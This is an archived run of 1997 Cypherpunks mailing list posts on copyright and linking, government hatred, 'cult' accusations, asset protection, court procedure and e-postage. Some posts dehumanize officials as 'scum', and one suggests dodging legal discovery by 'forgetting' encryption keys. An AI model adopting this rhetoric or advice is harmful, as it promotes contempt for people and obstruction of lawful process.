>one of those platforms, then you're not much of a cypherpunk, are
>you?

I see to be an "official" Cypherpunk(TM) you can only use an approved
Operating System??

I guess I woun't be getting my secret decoder ring in the mail then?

Smuck!

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/xrMo9Co1n+aLhhAQG4KwP/XiVcephv5gclrh2Lww+8u8tzO4JisWCT
cJ3Hx+haSA4CBkXLoBzrrst/9loFKwowyIcjXA+f+OIMiBJKQV6JmLMgL1RzcRXQ
PIQJy1ZbFb4q/x0AVC39lXcDeHV5LOhyzQqdD0/n2P3cQf/TAsiYZme0oZw7mOOF
GC8+wqTNFEg=
=rlAC
-----END PGP SIGNATURE-----






From stutz at dsl.org  Thu Aug 21 10:46:27 1997
From: stutz at dsl.org (Michael Stutz)
Date: Fri, 22 Aug 1997 01:46:27 +0800
Subject: creative references (was Re: CPAC Quotes Templeton)
In-Reply-To: <199708192312.AAA03093@server.test.net>
Message-ID: 



On Wed, 20 Aug 1997, Adam Back wrote:

> Is it possible to include text in a web page?  I know you can do
> images (as in the above example) by doing:
> 
> 	Look what the silly copyright police are doing...
> 
> 	
> 
> 	isn't that a daft claim?
> 
> And copyright.police.com is serving their own image so they have no
> grounds for complaint.  (Moi? I just referenced it... it was Joe Q
> Publics web browser which combined my text and your copyrighted
> image).

Right, so this isn't an infringement on their so-called rights because your
document does not contain the image but just the link. The problem, I think,
is in thinking of the HTML document as a completed work and not a set of
instructions, for which it is. The completed "page" exists soley on the
screen of the browsing party, and the copyright-image.gif graphic in
question was obtained from the copyright.police.com web site and not yours.

Plus, I think it could be further argued that by putting any information on
the Web implies that you are allowing any other party on the Web to link to
it in any way they so choose.

> Now I don't think you can do
> 
> 	
> 
> directly, but I'd be willing to bet you could do it with javascript/or
> java, in such a way that the viewer wouldn't really figure out where
> the various parts of the current "page" were coming from.

A very useful program would be one which could obtain a portion of text from
any page, or obtain the text from a page _starting_ at a certain point, not
unlike the  notation, but without the
 tag having to exist. Then, any portion of text from any page
could be easily referenced.


> Anyway, the copyright police, WIPO, SPA etc. are the enemy in my book.
> The difficulty of trying to applying these old laws to the internet
> where they hardly make sense, suggests that copyright is going to have
> to "give" longer term to adjust to reality.  Legislation against
> gravity never works out long term.

For sure. In a geodesic network, the center will not hold.

m

email stutz at dsl.org  Copyright (c) 1997 Michael Stutz; this information is
  free and may be reproduced under GNU GPL, and as long
                     as this sentence remains; it comes with absolutely NO
		     WARRANTY; for details see .






From sunder at brainlink.com  Thu Aug 21 11:26:30 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Fri, 22 Aug 1997 02:26:30 +0800
Subject: heart
In-Reply-To: <199708211706.TAA00218@xs1.xs4all.nl>
Message-ID: 



On Thu, 21 Aug 1997, Zooko Journeyman wrote:

> This is a cop-out, used by emotionally stunted men to excuse 
> themselves from their solemn responsibility to ethically 
> justify their own actions and to deal fairly with their fellow
> humans.

The elected scum are far from being human.  Apparently you haven't been
paying attention to lovely incidents involving plungers.  Is that
demonizing them?  Yes?  Good!
 
> By reciting mantras to one another emphasizing their sense of 
> having been mistreated and their sense of having 
> _unquestionable_ moral superiority, people in this situation 
> persuade each other to become more and more fanatical in their 
> attitudes, less and less in touch with reality, and less and 
> less compassionate towards the "others" who have been demonized
> in the process.

What compassion did they show?  Toilet plungers?  Bullets in the head,
flame throwers and tanks?

Unquestionable?  The very fact that I'm replying to you rather than
sending out the toilet plunger brigade should give you a hint.  What would
the LEA's do were you to present the same arguement to them and cause
enough noise that others took notice?

> Note that this process _always_ includes a group of other 
> humans which are demonized in order to serve as a scapegoat and
> as a concrete focus for the participant's negative emotions.

Right.  Same thing they must have been feeding the FBI the morning of the
Waco incident.  I believe the key phrases were "gun toting child
molesters."  Nevermind that they fried to a crisp those same kids they
supposedly were going to free from the clutches of the evil gun toting
child molesters, and the supposed molesters.
 
> This process is objectively identical to the process 
> experienced by _all_ hate groups, gangs and nationalists.

Incorrect: this process is objectively identical to the process
experienced by all HUMANS when faced with a horrid freedom destroying
government.  That it coincidentally is the same for the jackbooted thugs
before they are told to attack.

The difference is that no one is telling me to hate or feel rage.  The
actions of those who abuse freedom are my only inspiration.

> You are standing in the auditorium, Louis Freeh's face is 
> displayed on the screen, interposed with film of jackbooted 
> thugs breaking down your door, and you are screaming wordlessly
> at him along with all of your brethren during the Two Minutes 
> Hate.

Better that than standing in the auditorium and having Philip Zimmerman's
face displayed on the screen, interposed with a film of keys and cyphers
encrypting data and screaming wordlessly durring the Two Minutes of
Hate.  At least the former is based in honesty, not governmental orderes
under the threat of thoughtcrime.  It's not enough to fear Big Brother,
you must love him.

> THAT should give you pause for thought, Ray.

Still doesn't lessen the enemy's action, nor will it help the wrongs they
commited any.
 
> Listen to me:  I might take up arms in the trenches next to you
> someday, if it comes to that.  I might murder enemies or 
> civilians in their sleep, if I were convinced that it was the 
> only way to preserve the people and the ideals that I love.  

Who said I'd be in the trenches or murder the enemy?  Who said I would
pick up a weapon and use it?  Hating them is not the same as taking
actions to quench that hate.  That should give your panic pause for
thought.

> I might work to deploy ideas and technologies that threaten to
> induce social chaos, if I believed that those ideas and 
> technologies were the only way to ensure the blessings of 
> liberty and prosperity for my children.

Do what you think is necessary within your ideals.
 
> But I will _never_ take one of these actions while intoxicated
> by a cloud of hatred and self-righteousness.  I will _never_ 
> tell myself that I am part of a sacred jihad which absolves me
> of all guilt, and I will _never_ re-classify my enemies as 
> sub-human in order to justify my treatment of them.

Erm?  What Jihad?  Since where are we so organized and sacred?  Hell, I
don't even own a gun, I don't know where you get your knee jerk reaction
from.  You certainly don't see me renting a Rider Truck and buying
fertilizer.  So where do you get "sacred" and "jihad" from?

Am I supposed to silence my hatred for the crimes against humanity that
the scum in power have commited, or for their incessant attempts at
destroying our freedoms because you can't deal with another's hatred?
Because you imagine and fear that hatred will lead to action?  Isn't that
what CENSORSHIP is about after all? 

> So take a fucking BREAK man.  Just get up from the computer and
> go for a fucking walk in the mountains and think about your 
> fucking family and loved ones.

I wouldn't think, nor hate, this way if it weren't for thinking about my
family and loved ones and their freedom.


=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From feanor at nym.alias.net  Thu Aug 21 11:54:44 1997
From: feanor at nym.alias.net (Feanor)
Date: Fri, 22 Aug 1997 02:54:44 +0800
Subject: Find Info You Never Thought Possible..ONLINE!!
Message-ID: <19970821182355.7998.qmail@nym.alias.net>



On Aug 21,  7:56, INFOREVOLUTION wrote:
} Subject: Find Info You Never Thought Possible..ONLINE!!
> 

> Find The Dirt On The Internet!!
> 
> You will not receive any more correspondence from us!!!!!
> -----------------------------------------------------------------------------
> 
> We have done the research for you!!! With this power tool you can access
> information all over the World Wide Web about your employees, friends and
> rivals. We give you the access to hundreds of sites that will supply you
> with information about DMV records, credit profiles, medical and criminal
> records, most anything you would want to know.

Wow.  Pseudolibertarian spam.

Anyone wanna bite, fork the money and report back to us?







From vipul at pobox.com  Thu Aug 21 12:17:26 1997
From: vipul at pobox.com (Vipul Ved Prakash)
Date: Fri, 22 Aug 1997 03:17:26 +0800
Subject: Alex le Heux
In-Reply-To: <199708201358.PAA05461@basement.replay.com>
Message-ID: <199708220024.AAA00347@fountainhead.net>



Alex de Joode wrote:

> : What's a sourcecode book without a few drinks spilled on it? :)

> Whatever happend to the sourcecode books ? :)

fuel for nostangia and hubris. 

vipul

-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul at pobox.com 	          | - Web Objects 
91 11 2233328                     | - PERL Development 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - Networked Virtual Spaces






From vipul at pobox.com  Thu Aug 21 12:40:53 1997
From: vipul at pobox.com (Vipul Ved Prakash)
Date: Fri, 22 Aug 1997 03:40:53 +0800
Subject: An end to "court appointed attorneys"
In-Reply-To: <19970820222934.23073@bywater.songbird.com>
Message-ID: <199708220040.AAA00446@fountainhead.net>



Kent Crispin wrote:

> On Wed, Aug 20, 1997 at 08:51:09PM -0700, Tim May wrote:
> > At 1:16 PM -0700 8/20/97, Patrick Oonk wrote:
> > 
> > But the ability of a herd to take a vote, real or alleged, will not be
> > sufficient to collect tribute from those who don't want to make the
> > contribution freely.

> Note another characteristic of cult thinking -- total separation of
> the illuminati from the "herd" -- the idea that the "chosen" are
> irrevocably different from those other unfortunate creatures that
> accidentally share the same physical form. 

the idea is that the "competent" (not "chosen") are irrevocably different 
from those other "incompetent and parasitical" (and not "unfortunate") 
creatures that accidentally share the same physical form.

best,
vipul

-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul at pobox.com 	          | - Web Objects 
91 11 2233328                     | - PERL Development 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - Networked Virtual Spaces






From frissell at panix.com  Thu Aug 21 12:54:58 1997
From: frissell at panix.com (Duncan Frissell)
Date: Fri, 22 Aug 1997 03:54:58 +0800
Subject: Inside the Cypherpunks Cult
In-Reply-To: <199708182326.AAA00880@server.test.net>
Message-ID: <3.0.2.32.19970821152909.036713a0@panix.com>



-----BEGIN PGP SIGNED MESSAGE-----

At 11:49 PM 8/19/97 -0700, Kent Crispin wrote:

>It's actually closer to a cult -- a small group with it's own shared
>reality -- a reality quite at variance with societal norms.  The cult
>has its own terminology, and an underlying dogma to which these code
>words refer.  The cult has "special knowledge" that has been revealed
>to them concerning massive changes that will happen to society --
>changes that will usher in a new world order.  These changes may 
>involve the world going through a cleansing fire of war of war and 
>destruction. 

One minor difference is that most cults don't manage to convince the head of 
the FBI and various other national leaders that their scenario is possible.  
[I'm not saying that we actually convinced anyone ourselves but we certainly 
share a vision of a possible future with Freeh and various intelligence 
types.]  They talk about their fears of digital anarchy all the time.  I 
don't remember the FBI director talking about the Lamb and the Book of Rev 
like Koresh or about the saucer behind Hale-Bopp like Heaven's Gate.

Not an ordinary cult.

DCF

"If Vince Foster had a gun he'd be alive today."
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBM/yXAYVO4r4sgSPhAQGiCAP/SGwXrg5LFHtSQLE6qKfBNiltjwC7b15b
SA87/SZPuLSaK1u/oYgXdlSBlmac1tN2Ur7bmeR6AA5opIlC0Edq7FRiMx/RWk6d
tQOYaS7QJThgfWa+Hp+Z2xX8UGz8JYzrCrnPXdMrboDvcReGuPR+52TlE2lUra2H
AQMBcq/Vin0=
=eQJD
-----END PGP SIGNATURE-----






From tcmay at got.net  Thu Aug 21 13:04:24 1997
From: tcmay at got.net (Tim May)
Date: Fri, 22 Aug 1997 04:04:24 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: <1.5.4.32.19970821161048.00743ce8@pop.pipeline.com>
Message-ID: 




I usually can't understand more than 5% of what John writes, but then I was
never very good at Blake, Coleridge, and all those DWM dudes.

But I think I understand this paragraph:

At 9:10 AM -0700 8/21/97, John Young wrote:

>Now, to move on to the day's news: Is Tim going to be kidnapped
>by a gang of mixed breed cops and ammo merchants, shot instantly
>and chained in dugout till his loved redeems his maggoty carcass by
>redistributing his nestegg? That's the topic of the NYT's lead business
>story today, the need for secret ransom insurance, so secret that it
>does not make you a free-for-taking target like the usual unwise display
>of peacockery.

Like the game of chicken, it pays to look like a madman. Strangelovian
logic, but valid. If attackers _think_ a victim will pay a ransom, or
relatives will, or that hostage/ransom demands will be met, the result is
both more such events "overall" (which is usually not a concern we as
individualists have), but also an increased probability of
kidnapping/terrorism in the first place. Fairly classical game theory, with
mix-ins specifically of the tragedy of the commons ("everyone negotiates")
and the iterated prisoner's dilemma ("let's all agree not to negotiate,"
except many "defect" from the pact).

Interestingly, many of the strategies for moving assets offshore, to
offshore banks and money havens, is not so much to evade taxes as to
"protect assets." Protect them from ransom/extortion demands of the _legal
profession_ sort, e.g., "deep pockets" lawsuits. For example, somebody
finds out that J. Random Cypherpunk is  financially well off--perhaps from
the increasing number of online credit report records, etc.--and decides to
have a convenient "fall" on his property. He then sues for some large
amount, either covered by Homeowner's Insurance, or more.

(Think this is paranoia? Look into "deep pockets," Lerach, and the
escalation of such lawsuits.)

Not to mention lawsuits by ex-spouses (or even current spouses, who want a
bigger cut of the action).

This is part of what Duncan talks about with his points about "judgment
proofing" oneself. (Two main ways to do this: have few assets, and rent
cars, keep residence somewhat secret. Or, move assets beyond the grasp of
the court system. Both have advantages and disadvantages.)

Unsurprisingly, such attempts to hide assets, even if not done for tax
evasion reasons!!!, are looked at unkindly by the authorities, who would
like it much better if all assets were visible to them and hence pluckable
on various pretexts. The restrictions on banking privacy--named in true
Orwellian fashion, the "Bank Privacy Act"--can be seen as moves to force
all assets out into the open. And the whole "discovery" process in divorce
and civil cases, where even private diaries and personal papers must be
produced for perusal by various parties, is a shameful abrogation of Fourth
Amendment protections. That a court has duly ordered the turning over of
diaries, letters, records, etc. is no excuse.

(When I was at Intel we were urged to never write down anything which could
be used against the company in a lawsuit. Increasingly this meant "don't
write anything down on paper" unless it is neutral and bland. I understand
things have since gotten even more paranoid, and that this is a common
practice. Under "discovery," literally tons of records can be ordered up,
including Day-Timers, scratchpad notes, archives of e-mail, etc. Technical
solutions abound, of course, such as hosting the archives in offshore
locations, or using strong crypto....and "forgetting" the key. This,
obviously, is yet another reason the authorities want "key recovery.")

>Hide it if you got it, hide your lush affiliations too, the poor reporters
>advise, or the world's scum with nothing else to do but watch and wait
>are gonna snag your unsmart ass when you least expect it, now as in
>ages past, unless, to be sure, more scum-world guardians are hired
>and more big-nuke prayerbooks and ransom policys are arsenaled
>bedside, 4X, ankle and thigh.

Not sure what this means, but hiding assets is becoming harder, not easier.
Strong crypto may someday reverse this, but it sure ain't the case today.

(Don't anybody waste their or my time with penny ante ideas for getting
small amounts of money out of the country.)

--Tim May



There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From tcmay at got.net  Thu Aug 21 13:14:09 1997
From: tcmay at got.net (Tim May)
Date: Fri, 22 Aug 1997 04:14:09 +0800
Subject: Rants by Zooko about Emotionally Stunted Men
In-Reply-To: <199708211706.TAA00218@xs1.xs4all.nl>
Message-ID: 



At 10:06 AM -0700 8/21/97, Zooko Journeyman wrote:
> A million monkeys operating under the pseudonym
> "Ray Arachelian " typed:
>>
>> Meethinks (not speaking for Tim) that years under a fascist natzi-like
>> regime bent on ripping out all out freedoms one by one and confiscating
>> all things threatening to it would cause any awake person to lose any
>> compassion for the scum that run our Freeh country.
>
>
>BULL SHIT.
>
>
>This is a cop-out, used by emotionally stunted men to excuse
>themselves from their solemn responsibility to ethically
>justify their own actions and to deal fairly with their fellow
>humans.
>
>
>By reciting mantras to one another emphasizing their sense of
>having been mistreated and their sense of having
>_unquestionable_ moral superiority, people in this situation
>persuade each other to become more and more fanatical in their
>attitudes, less and less in touch with reality, and less and
>less compassionate towards the "others" who have been demonized
>in the process.

I have written truly large numbers of posts explicating my philosophy. You
may not agree with my point of view, but characterizing me--as I assume you
were in your response to this thread about "Tim's heart"--as merely
reciting mantras to others is false.

It is you, B., who have generally been inactive on the list for quite some
time, only occasionally dropping in to snipe. Referring to us as
"emotionally stunted men",,,now there's a solid argument for whatever it is
your position is.


>Note that this process _always_ includes a group of other
>humans which are demonized in order to serve as a scapegoat and
>as a concrete focus for the participant's negative emotions.

You mean like "emotionally stunted men"?

Or do you mean like the characterization of list members as "socio-economic
cult" members?

>But I will _never_ take one of these actions while intoxicated
>by a cloud of hatred and self-righteousness.  I will _never_
>tell myself that I am part of a sacred jihad which absolves me
>of all guilt, and I will _never_ re-classify my enemies as
>sub-human in order to justify my treatment of them.
>
>So take a fucking BREAK man.  Just get up from the computer and
>go for a fucking walk in the mountains and think about your
>fucking family and loved ones.

You sound like you're ranting to me. Lecturing others on their anger while
writing "take a fucking BREAK man" and foaming about sacred jihads and
emotionally stunted men....

Physician, heal thyself.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From rishab at dxm.org  Thu Aug 21 13:39:52 1997
From: rishab at dxm.org (Rishab Aiyer Ghosh)
Date: Fri, 22 Aug 1997 04:39:52 +0800
Subject: an end to "courts" (was RE: An end to "court appointed attorneys" )
Message-ID: <01BCAE9E.55579440@d414.pppdel.vsnl.net.in>



Tim May wrote:
>It's time to stop this "court appointed attorney" nonsense. If we as a
>nation want to change our legal system to one where the court appoints both
>sides of a case, prosecution and defense, as in many other countries, fine.
>But it's absurd to finance the hiring of defense lawyers.

or courts, for that matter. presumably under cryptoanarchy you won't
have courts - an imposition of authority on people presumed to accept
it - but arbitrators, agreed upon by the two sides. 

unlike in the common-law, jury system, such arbitrators would perhaps 
be able to use their intelligence to figure things out by talking to the opposing
sides directly, instead of requiring lawyers to pick fights in matters of a "law"
so distant from the people it affects that they can't interpret it directly.

however, with courts - and the common-law/jury system, which has _some_ 
benefits over, say, the French or Spanish inquisitorial system of law - you
tend to require lawyers, and i suppose court-appointed attornees are a way
of "making justice blind" as it ought to be. of course, perhaps lawyers should
be avoided by not just the poor defence, but the rich prosecution - the hilariously
entertaining McLibel case in Britain showed that gutsy, if somewhat misguided,
lawyerless people could pull quite a bit over an expensive "dream team", which
McDonalds had.


-Rishab

First Monday - The Peer-Reviewed Journal on the Internet 
http://www.firstmonday.dk/  Munksgaard International Publishers, Copenhagen
          
Intl & Managing Editor - Rishab Aiyer Ghosh (ghosh at firstmonday.dk) 
Mobile +91 98110 14574; Fax +91 11 2209608; Tel +91 11 2454717 
A4/204 Ekta Apts., 9 Indraprastha Extn, New Delhi 110092 INDIA








From tcmay at got.net  Thu Aug 21 14:21:13 1997
From: tcmay at got.net (Tim May)
Date: Fri, 22 Aug 1997 05:21:13 +0800
Subject: an end to "courts" (was RE: An end to "court appointedattorneys" )
In-Reply-To: <01BCAE9E.55579440@d414.pppdel.vsnl.net.in>
Message-ID: 



At 5:58 PM -0700 8/21/97, Rishab Aiyer Ghosh wrote:

>unlike in the common-law, jury system, such arbitrators would perhaps
>be able to use their intelligence to figure things out by talking to the
>opposing
>sides directly, instead of requiring lawyers to pick fights in matters of
>a "law"
>so distant from the people it affects that they can't interpret it directly.

The modern American legal system, at least in the many recent capital
murder cases which have received such wide publicity, is not about a
"search for truth," obviously. Instead, it is an adversarial system (no
surprise there) in which competing teams spend vast amounts of money trying
to derail the other side, get jurors dismissed because of "jury consultant"
models, etc.

As the Simpson case showed, the logic went like this:

Prosecution: "The DNA results showed a match to an average of two out of
the earth's 7 billion inhabitants. Mr. Simpson's DNA was one of them. "

Defense: "So how come you ain't lookin' for da other guy?"

Jurors: "Like Johnnie said, if it do not fit, you must acquit."

By the way, the McVeigh case was filled with the same nonsense, from both
sides, and from the defense side especially.  I know that if I had been
unfairly accused of planting such a bomb, I'd be screaming at the top of my
lungs and would have testified extensively in my own trial.

Yeah, yeah, yeah, I can already hear some of you about to argue that a
defendant's silence is not evidence of guilt. But this is precisely the
kind of legalistic nonsense we are talking about! (I am not saying silence
equals guilt, or that testimony can be compelled, but it only stands to
reason that a jury should take into consideration that a defendant--Simpson
or McVeigh--never testified, never gave his side of the story, never
explained this theory of how things happened, etc.)

Anyway, a machine has been set up to let these dueling adversarial teams
consume vast amounts of court and public resources.

OJ Simpson could have received a trial beginning 60 days after the murders,
lasting for no more than 10 days, and with his execution to follow within
30 days after that. (Yes, I would allow one "appeal," with a higher court
listening to any objections to how the lower court operated, etc., and
possibly ordering a new trial, etc. It should not take more than a day or
two.)

The adversarial machine is made worse by the vast public subsidies of both
sides, the endless delays, and the general "legalisms" used by both sides.

As a personal note, my father was an officer in the U.S. Navy, and served
on several courts martial. No capital murder cases, that I recall him
mentioning, but some might serious matters. As most of you must know, the
system is much different than the main U.S. legal system. And my father
believes the military system is vastly more just, and quicker, and cheaper.
A 3-man panel hears the evidence presented, asks questions, listens to
defense points, etc., and then adjourns to reach a verdict. All in a few
days, of course.

No jury consultants making sure that no college graduates are on the jury,
that enough blacks are seated, that facial expressions indicate likely
sympathies to the defendant, etc.

The U.S. system is corrupt. Hordes of lawyers--too many, of course--swarm
out into the "System," inflating legal bills, billing at $200 an hour for
the Xerox copying time of junior lawyers, and even charging lavish lunches
to the other side. (I could cite dozens of examples...)

Those of you who have taken McVeigh's "side" against Steven Jones should
consider this whole situation. McVeigh, who quite clearly "did it," will
now get a new lawyer--and his team!--to handle the appeal. More delays,
more time billed at $300 an hour for the new top lawyer, and at $200 x 4 =
$800 for his major assistants, and at some unknown rate for his clerks,
secretaries, etc., all for what? So that an additional $500K or so is
spent, with a delay now of an additional 4 to 6 months "for the new lawyers
to familiarize themselves with the 200,000 pages of transcripts"...and so
on.

To what end? McVeigh did it, and only an Alice in Wonderland legalistic
society could even doubt it for a nanosecond.

(And in fact, we all accept this. Where's the real "outrage" that McVeigh
is being prosecuted for a crime he didn't commit? We were outraged that
Randy Weaver was entrapped on such a minor offense (shortening a rifle
barrel by an inch or two), and that his wife and son were then shot in an
ambush. We were outraged at Waco. We _are_ outraged at the treatment Abner
Louima received in NYC. But we are not outraged at McVeigh's treatment.
Because, as with OJ, anybody with three neurons to rub together knows he
did it. And yet the multi-year legal charade continues.)

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From au at dev.null  Thu Aug 21 14:21:47 1997
From: au at dev.null (Arthur Unknown)
Date: Fri, 22 Aug 1997 05:21:47 +0800
Subject: [Fwd: (Fwd) Microsoft - The Next Generation...]
Message-ID: <33FC3CE7.5A49@dev.null>

An embedded message was scrubbed...
From: unknown sender
Subject: no subject
Date: no date
Size: 6245
URL: 

From forger at dev.null  Thu Aug 21 14:32:05 1997
From: forger at dev.null (Tim G. May)
Date: Fri, 22 Aug 1997 05:32:05 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: <1.5.4.32.19970821161048.00743ce8@pop.pipeline.com>
Message-ID: <33FC3B4B.6729@dev.null>



John Young wrote:
> 
> gturk wrote:
> 
> >You must be referring to the Cult of Redistribution.
> 
> Tis true that as these accusatory options for blaming others
> are displayed here, it becomes hard to tell who's potshotting from
> what shifting position to gain better fire lines at friend and
> foe and own foot.

"When all you have is a gun, everything looks like a target."

Tim G. May
There's something wrong when I'm limping on a decreasing number of toes
-----------------------------------------------------------------------
    This post is selflessly copyrighted under the auspices of the 
             Electronic Bad Forgery Foundation (TM).
~~~~  
       {This probably means it's Toto again. Check the headers.}
                                                                   ~~~~
        "Imitation is the sincerest form of forgery."
-----------------------------------------------------------------------







From ucotc at dev.null  Thu Aug 21 15:23:09 1997
From: ucotc at dev.null (Owen Clear, OTC)
Date: Fri, 22 Aug 1997 06:23:09 +0800
Subject: Make Pennies Fast!!! / Re: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: 
Message-ID: <33FC4C95.1CE1@dev.null>



Orginating from: Owen Clear -- First Mate, U.S.S. Concept

In reply to Tim May:
> (Don't anybody waste their or my time with penny ante ideas for getting
> small amounts of money out of the country.)

  First, you get a round-trip ticket to Anguilla.
  Second, you buy a couple pairs of penny-loafers.

  ...uuhhh. Let me get back to you on this.
  (I want to double-check my math so I don't make a fool of myself.)

I remain,
  Owen Clear (on the "Concept")






From dformosa at st.nepean.uws.edu.au  Thu Aug 21 15:59:25 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Fri, 22 Aug 1997 06:59:25 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: <3.0.3.32.19970821112449.00973890@pop3.concentric.net>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 21 Aug 1997 gturk at concentric.net wrote:

> TruthMonger wrote:
> 
> >  Tim speaks of those who feel it is their duty/right to "collect
> >tribute from those who don't want to make the contribution freely."
> 
> You must be referring to the Cult of Redistribution.

The way I see it is quite simple,  if these peaple where not payed off it
is most likely that thay will turn to crime.  Other then condemming every
single impovished person to death, this is one of the better soultions to
a difficalt problem.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM/yKT6QK0ynCmdStAQFtNwP9FFPKoTRi/7bypK69DKXYl8MsfOBMJxnC
WwH3rHvudvih+yn+2EQj3rssar5Fui2YwQxV4/hVAWWUJMH2jhh1Y/DgSEbrDpy2
YNvuEe/IQMB+JxSX6AfZNhc1u3obNwYB4UxZNf7bI1KwA7xOTvWbFzY7PjQlBoAv
a8kdttfwdlc=
=PxBc
-----END PGP SIGNATURE-----






From hedges at sirius.infonex.com  Thu Aug 21 16:12:16 1997
From: hedges at sirius.infonex.com (Mark Hedges)
Date: Fri, 22 Aug 1997 07:12:16 +0800
Subject: curfew laws
Message-ID: <199708212305.QAA09758@sirius.infonex.com>




In response to an earlier thread about curfew laws being unconstitutional,
apparently a federal appeals court thinks so too. The San Diego curfew
law was struck down on June 9, 1997. The ACLU prosecuted. For the report
and a link to the decision see http://www.aclusandiego.org/curfew.html.

Mark Hedges






From rah at shipwright.com  Thu Aug 21 16:14:25 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 22 Aug 1997 07:14:25 +0800
Subject: Spam-killing PGP5/ecash postage plugin Was Re: Remailer  chaining  plugin for Eudora
Message-ID: 




--- begin forwarded text


X-Sender: rah at mail.shipwright.com
Mime-Version: 1.0
Date: Thu, 21 Aug 1997 18:31:17 -0400
To: e$@thumper.vmeng.com, mac-crypto at thumper.vmeng.com
From: Robert Hettinga 
Subject: Re: Spam-killing PGP5/ecash postage plugin Was Re: Remailer
 chaining  plugin for Eudora
Sender: 
Precedence: Bulk
List-Software: LetterRip 2.0 by Fog City Software, Inc.
List-Unsubscribe: 
List-Subscribe: 

At 4:29 pm -0400 on 8/21/97, Somebody wrote:


> Sorry, but I think e-postage is among the worst ideas I've ever heard of. I
> don't think it's clear that it would eliminate spam. It might even increase
> it -- I'll bet the overall costs of email are lower than for paper mail --

But the relative present cost of spam (free) is, um, siginificantly, less
than it would cost with e$postage.

> and it would be the death of mailing lists.

Not at all. At the very least, mail from lists I'm subcribed to could come
postage due. And, since I'm the person who's charging postage, sender pays,
remember, I could charge free postage to my friends, like the 1000 or so in
cypherpunks, or the 300 on e$ and mac-crypto. :-).

There are work arounds. Face it, the world is going to specific cash
settled auction pricing on internet services, and not bulk, or even
probabalistic, pricing.

No problem. It'll mean cheaper services in the long run, not only because
someone then owns the "commons", but because efficient autonomously run
cash-settled auctions are always cheaper than transfer pricing and
"planning". It's like comparing the Chicago Board of Trade wheat pit, the
world's most efficient wheat market, to the committee which set Soviet
wheat production quotas. Notice who was selling wheat to whom in *that*
scenario. :-).

Reality, economic or otherwise, is not optional...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/




---------------------------------------------------------------------
Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info at hyperion.co.uk
---------------------------------------------------------------------
Like e$? Help pay for it!  See 
Or, for e$/e$pam sponsorship, 
---------------------------------------------------------------------

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From anon at anon.efga.org  Thu Aug 21 16:35:45 1997
From: anon at anon.efga.org (Anonymous)
Date: Fri, 22 Aug 1997 07:35:45 +0800
Subject: None
Message-ID: 



